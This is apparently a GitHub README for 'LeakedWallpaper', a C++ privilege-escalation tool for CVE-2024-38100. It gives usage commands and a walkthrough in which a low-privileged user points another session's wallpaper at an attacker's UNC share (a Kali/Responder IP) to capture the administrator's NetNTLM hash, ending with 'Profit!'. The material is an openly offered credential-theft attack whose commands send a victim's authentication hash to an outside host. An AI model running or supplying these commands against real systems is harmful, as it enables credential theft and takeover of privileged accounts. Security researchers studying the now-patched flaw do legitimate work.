/LeakedWallpaper

Leak of any user's NetNTLM hash. Fixed in KB5040434

Primary LanguageC++

Leaked Wallpaper

This is a privilege escalation tool (fixed with CVE-2024-38100 in KB5040434) that allows us to leak a user's NetNTLM hash from any session on the computer, even if we are working from a low-privileged user.

Usage

.\LeakedWallpaper.exe <session> \\<KALI IP>\c$\1.jpg [-downgrade]

# Example
  .\LeakedWallpaper.exe 1 \\172.16.0.5\c$\1.jpg -downgrade

Demo

Video

https://youtu.be/InyrqNeaZfQ

If blocked, see demo.mkv

Photos

Imagine we have two sessions on the host:

  • administrator is a privileged account, its NetNTLM hash is what we want to get
  • exploit is a low-privileged account, we are working from it.

Current session id: 2 Target session id: 1 изображение

Responder IP: 172.16.0.5 Windows IP: 172.16.0.2 изображение

Let's get administrator NetNTLM-hash with the tool!

.\LeakedWallpaper 1 \\172.16.0.5\c$\1.jpg

Profit! изображение